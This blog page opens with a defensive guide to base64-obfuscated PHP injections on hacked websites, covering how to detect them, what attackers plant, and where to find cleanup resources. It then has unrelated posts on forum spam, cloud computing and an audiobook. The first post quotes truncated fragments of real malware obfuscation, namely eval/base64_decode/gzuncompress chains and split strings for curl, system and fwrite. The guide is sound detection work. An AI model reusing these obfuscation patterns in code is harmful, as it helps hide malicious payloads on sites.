Base 64 code injection in a lot of sites

A lot of websites seem to suffer from injected files. It also happened to a few of my own sites. Apparently “they” use holes in code to do this. It is a tactic that has at least being going on for a year, if not longer.

1. How can you check it if you are infected?

1) A good “trick” (although reactive and dependent on Google) is use Google Chrome to surf to one of your websites, there is a good change you will get the following notice but you have to set under your privacy settings the “protection against phishing and malware”

image

it means that Google has found the injected code. In the webmaster tools you will find then a list of files it found that has been affected. Handy to immediately go and check for that file. (in my case a php file has been uploaded in one of my image upload directories).

2) you see strange behavior on your site e.g. a footer that gives an error message. You should check your footer.php or the code that generates the footer for javascript includes. You might need to scroll your window to the right to see it.

3) Use an active virus scanner that scans for these injections and go through your websites

4) Run a script to check for php files with base 64 encodings (see below)

5) If you run an intrusion detection system, a light one like the wordpress monitor plugin that mails you if file have changed or heavier intrusion detection systems well… it will notice you (sometimes).

6) you can schedule security audits to be performed on your installation, that might also help to inform you about security issues.

2. What is actually done on your server?

2.1 additional php files are placed

On the first place .php files will have been placed in random places throughout your directory structure, these contain the actual malicious code that calls to the outside.

They carry random names to not be detectable that way. A few names I encountered out of a long list:

  • coven.php (6k)
  • fileNice.php (4k)
  • poofy.php (6k)
  • tc_general.php (6k)
  • utilities.php (3k)
  • aviso.php (6k)
  • etape.php (15k)
  • input.php (4k)
  • jquery-bgiframe-min.php (4k)
  • order.php (8k)
  • backgroundImage.php (4k)
  • dumky.php (14k)
  • frond.php (7k)
  • jquery.lavalamp.php (4k)
  • markt.php (4k)
  • expand.php (3k)
  • func2.php (4k)
  • haugh.php (7k)
  • ja.catslwi.php (7k)
  • vault.php (6k)
  • etc… etc…

They are all 644 in terms of permission so they can not be detected by inspecting the permissions UNLESS your other files are not 644. If that is the case it makes detecting them very easy but then your files were not secure in the first place (I assume).

They all have the date and time of the other files in that specific directory, so you can not identify them based on their date time, the algorithm behind it probably does a date-time set according to the other files in the directory structure. (maybe you could run a script that gives each file an increasing date to detect strange additions better the next time).

In most cases the code that is executed in these files is garbled. In most cases base 64 encoding has taken place.

Some examples of more simple base 64 encoded evaluated strings as seen in these files:

[ccN_php] eval(gzuncompress(base64_decode(‘
[/cc] [ccN_php] $fr = strrev(“sserpmocnuzg”); $df = strrev(“edoced_46esab”); eval($fr($df(‘
[/cc] [ccN_php] $v1 = strrev(“edoced_46esab”); $v2 = strrev(“sserpmocnuzg”); eval($v2($v1(‘
[/cc] [ccN_php] $cares = strrev(“edoced_46esab”); eval(gzuncompress($cares(‘
[/cc] [ccN_php] $sa = array(‘4_decode’,’base6′); $sb = array(‘gzunco’,’mpress’) ;$t1 = $sb[0].$sb[1]; $t2 = $sa[1].$sa[0]; $tfi = array(‘
[/cc] [ccN_php] $a1 = array(“edoced_”,”46esab”); $a2 = array(“sser”,”pmocnuzg”) ; $a3 = array(‘
[/cc]

Some examples of more advanced calls using function calls and more obfuscated code using functions and a lot of “innovative” garbling:

[ccN_php] function authcode($i){$a=Array(‘
[/cc] [ccN_php] function fuck($i){$a=Array(”,’Xw==’,’Xw==’,’XFxcIg==’,’XCI=’,’XFwn’,’Jw==’,’XFxcXA==’,’XFw=’,’XA==’,’Lw==’,’Ly8=’,’Lg==’,
function fuck($i){$a=Array(”,’Xw==’,’Xw==’,’XFxcIg==’,’XCI=’,’XFwn’,’Jw==’,’XFxcXA==’,’XFw=’,’XA==’,’Lw==’,’Ly8=’,’Lg==’,
[/cc] [ccN_php] $GLOBALS[‘_figu_’]=Array(” .’f’ .’uncti’ .’on_exi’ .’sts’,’fun’ .’ction_exists’,’cu’ .’rl_init’,’c’ .’url_set’ .’opt’,” .’curl_’ .’se’ .’t’ .’opt’,” .’cu’ .’r’ .’l_seto’ .’pt’,’curl_set’ .’o’ .’pt’,’cu’ .’rl_’ .’setopt’,’c’ .’u’ .’rl’ .’_setopt’,’curl_setopt’,’cur’ .’l_exec’,’c’ .’ur’ .’l_cl’ .’ose’,’i’ .’n’ .’i_g’ .’et’,’fil’ .’e_get_’ .’co’ .’n’ .’ten’ .’ts’,’fun’ .’ction_exists’,’p’ .’reg_’ .’re’ .’p’ .’lace’,’e’ .’re’ .’gi’,’ere’ .’gi’,’eregi’,’strlen’,’set_’ .’time_limit’,” .’i’ .’ni_s’ .’et’,’erro’ .’r_re’ .’p’ .’o’ .’r’ .’tin’ .’g’,’header’,’header’,’gmda’ .’te’,’he’ .’ade’ .’r’,’header’,’h’ .’e’ .’ad’ .’er’,” .’date’,’system’,’date’,’fil’ .’e’ .’_e’ .’xists’,’f’ .’o’ .’pen’,’f’ .’close’,’fi’ .’le’ .’_’ .’exists’,’rand’,’fopen’,’f’ .’wr’ .’ite’,” .’f’ .’c’ .’lose’,” .’bas’ .’e64_de’ .’code’,” .’f’ .’ile_get_’ .’c’ .’onten’ .’ts’,’file’,’t’ .’rim’,’fo’ .’pe’ .’n’,’f’ .’write’,” .’fclose’); ?> [/cc]

So as you can see they are difficult to detect by scanning the files. Someone has written a script to detect base64 encodings (see below) but I have not tried that one yet. I don’t know if that will detect all possible obfuscations.

2.2 calls to these php files are inserted in your php code

Next, javascript based calls are placed inside (random):

  • your existing php files
  • your existing javascript (includes)

For WordPress I have seen inclusions in both core code e.g. jquery library files or your custom code e.g. in the footers of themes but also on many other places.

2.3 your .htaccess rules have been adjusted

Check your .htaccess file for any changes

2.4 images disguised as jpg files are uploaded

You not only need to look for .php and .js files but also for images. Since code could have been hidden in there. The tip found here is to check the the option tables in the database for these kind of images.

2.5 additional ADMINistrators have been added

This scares the shit out of you but it happened on one of my WordPress installations: I saw an extra admin …

2.6 code may have been injected in your content e.g. pages and posts
Search for patterns in your content like iframes, scripts, display: A lot of variations are used here.

3. How to clean them?

Currently I am cleaning them one by one since I own my own servers and pretty easily can run through the directory structure. I also have found a script that can check for base64 encodings I have not tried that one yet.

Ofcourse it is needed to know WHAT code is vulnerable, possibly some plugins or maybe even some core code due to the wide spread infection. I have not figured that out yet. It happens to a lot of platforms so including platforms that do not run WordPress but totally different software. So my guess it uses a library of possible zero-day security holes.

4. More references

I am including a list of websites that have written about base64 encoded js injections:

  1. http://codex.wordpress.org/FAQ_My_site_was_hacked
  2. http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
  3. http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
  4. http://tipsforwordpress.com/php/code-injection/
  5. http://inspirated.com/2010/03/02/wordpress-ninoplas-virus-and-the-fix
  6. http://wordpress.org/support/topic/admin-blown-up-amp-possible-virus
  7. http://www.rvoodoo.com/projects/the-dreaded-base64-wordpress-hack-and-other-hacks-too/

5. Helpful WordPress Tools

  1. http://wordpress.org/extend/plugins/wordpress-file-monitor/

(this post is being updated)

Forum spam campaign going around

image There seems to be some kind of Internet campaign to post on every forum and every thread that is even lightly political (even on WordPress plugins sigh…) the message that "George Soros is a nazi" with some vague story around it.

To be honest I never heard of this guy until all these messages popped up. So I went to wikipedia to find out and… discovered a hero!

I’m glad that I read about this person it gives me some hope for a better future:

- Soros has been active as a philanthropist since the 1970s, when he began providing funds to help black students attend the University of Cape Town in apartheid South Africa, and began funding dissident movements behind the iron curtain.

- Soros’ philanthropic funding includes efforts to promote non-violent democratization in the post-Soviet states. These efforts, mostly in Central andEastern Europe, occur primarily through the Open Society Institute (OSI) and national Soros Foundations, which sometimes go under other names (such as the Stefan Batory Foundation in Poland).

- Other notable projects have included aid to scientists and universities throughout Central and Eastern Europe, help to civilians during the siege of Sarajevo, and Transparency International. Soros also pledged an endowment of €420 million to the Central European University (CEU). The Nobel Peace Prize winner Muhammad Yunus and his microfinance bank Grameen Bank received support from the OSI.

- In an interview with The Washington Post on November 11, 2003, Soros said that removing President George W. Bush from office was the "central focus of my life" and "a matter of life and death." He said he would sacrifice his entire fortune to defeat President Bush, "if someone guaranteed it."[39] Soros gave $3 million to the Center for American Progress, $2.5 million to MoveOn.org, and [40] to America Coming Together. These groups worked to support Democrats in the 2004 election. On September 28, 2004 he dedicated more money to the campaign and kicked off his own multi-state tour with a speech: Why We Must Not Re-elect President Bush[41] delivered at the National Press Club in Washington, DC.

- In August 2009, Soros donated $35 million to the state of New York to be ear-marked for under-privileged children and given to parents who had benefit cards at the rate of $200 per child aged 3 through 17, with no limit as to the number of children that qualified. An additional $140 million was put into the fund by the state of New York from money they had received from the 2009 federal recovery act.[21]

- According to Neil Clark in the New Statesman, Soros’s role was crucial in the collapse of communism in Eastern Europe. Clark states that from 1979, Soros distributed $3m a year to dissidents including Poland’s Solidarity movement, Charter 77 in Czechoslovakia and Andrei Sakharov in the Soviet Union; in 1984, he founded his first Open Society Institute in Hungary and pumped millions of dollars into opposition movements and independent media.[44]

- Since the fall of the Soviet Union, Soros’ funding has continued to play an important role in the former Soviet sphere. His funding and organization of Georgia’s Rose Revolution was considered crucial to its success by Russian and Western observers, although Soros has said that his role has been "greatly exaggerated."[45] Alexander Lomaia, Secretary of the Georgian Security Council and former Minister of Education and Science, is a former Executive Director of the Open Society Georgia Foundation (Soros Foundation), overseeing a staff of 50 and a budget of $2,500,000.[46]

Former Georgian Foreign Minister Salomé Zourabichvili wrote that institutions like the Soros Foundation were the cradle of democratisation and that all the NGOs which gravitated around the Soros Foundation undeniably carried the revolution. She opines that after the revolution the Soros Foundation and the NGOs were integrated into power.[47]

Some Soros-backed pro-democracy initiatives have been banned in Kazakhstan and Turkmenistan.[48] Ercis Kurtulus, head of the Social Transparency Movement Association (TSHD) inTurkey, said in an interview that "Soros carried out his will in Ukraine and Georgia by using these NGOs…Last year Russia passed a special law prohibiting NGOs from taking money from foreigners. I think this should be banned in Turkey as well."[49] In 1997, Soros had to close his foundation in Belarus after it was fined $3 million by the government for "tax and currency violations". According to the New York Times, the Belarussian president Aleksandr Lukashenko has been widely criticized in the West and in Russia for his efforts to control the Belarus Soros Foundation and other independent NGOs and to suppress civil and human rights. Soros called the fines part of a campaign to "destroy independent society".[50]

In June 2009, Soros donated $100m to Central Europe and Eastern Europe to counter the impact of the economic crisis on the poor, voluntary groups and non-government organisations.[51]

- The Open Society Initiative for Southern Africa is a Soros-affiliated organization. [1] Its director for Zimbabwe is Godfrey Kanyenze, who also directs the Zimbabwe Congress of Trade Unions (ZCTU), which was the main force behind the founding of the Movement for Democratic Change, the principal indigenous organization promoting Regime change in Zimbabwe.

Etc… etc…

I know I’m probably showing my total ignorance of never heard of him since he is very rich and wrote quite some books and did all of this but… you are never to old to learn :)

Thanks for the spammers to let me find a new hero.

(I think it is time for my hero gallery on this weblog don’t you think?)

Where will my little cloud go

Cloud computing is Internet-based computing, whereby shared resources, software, and information are provided to computers and other devices on demand. (do you use gmail?)

image I like "the cloud" :

1. I can access my stuff from anywhere on any device
2. I don’t have to think about backups (and even can signup with cloud backup)
3.  I don’t have to develop and maintain these apps myself, some other folks will add new functionality

However… I am already beginning to feel disadvantages:

1. The more stuff I signup with (flickr, family+friends, dropbox, etc…) the more I monthly pay altogether for this stuff (awaiting monthly subscriptions for the free services like webmail) (and including my donations)
2. the more I "outsource" (other than me improving and maintain the software / hardware) the more I loose control on security and privacy but also functionality improvement I want.

So… this will probably drive me (and a lot of people like me) to a point where running your own server is cost-technically still the most interesting. It means work each month to maintain the os, (open source) apps and possibly write my own stuff but it will save me money in the end. Then again it will probably only be for the few lucky ones who can secure a linux environment, do server optimization and are in general technically somewhat more able because else the time invested in learning how to do "all of this" is not worth the effort.

And… to even bring these costs even more down … I think more and more people will probably buy a server and place it somewhere in their house and have it accessible via the outside world . Meaning: a lot of households will get little clouds.

I’m not saying anything new here, a certain group of people has been running these things like in the uhm… pre-Internet BBS era. And a lot of ‘Linux persons’ are running their servers for years and years but… I think however it will go mainstream now.

And uhm… I am also writing this to convince my wife that this new high-end server is absolutely needed apart from our X other computers on our gigabyte LAN with its own N terabyte storage capacity because uhm… more services in the cloud for our household simply means: we need more powerful servers in house. So… uhm… in the end it will save us a lot of money :) (there is however the downside that maintenance and functional improvement DO mean some hours per month you have to set aside for these tasks) (luckily some people like this for a hobby) (and maybe there is a business opportunity for servecing the 99% out there who has no clue).

Audio Book of the month: The Gods of Mars

image

If you click on the left bottom of this page you can listen to the book "The Gods of Mars" (1918) by Edgar Rice Burroughs, when you click playlist you can click through the 22 chapters.

I’m starting this initiative to give some attention to Librivox where "all of us" can volunteer to read books that are in the public domain.

image

The book is the follow-up to A Princess of Mars and tells about the fantastic adventures of John Carter on Barsoom. (I loved the comics when I was a kid).

image

image

image

image

The audio book is available for free on Project Gutenberg’s audio book collection.

Since the ratio free books versus free audio books is still small consider joining Librivox where you can volunteer to record chapters of books in the public domain. (On Librivox you can find more books in this John Carter series) and you can download The God of Mars there also.

This book was read by JD Weber and the total running time is 7:41:49

Take a look at some recently finished audio books also!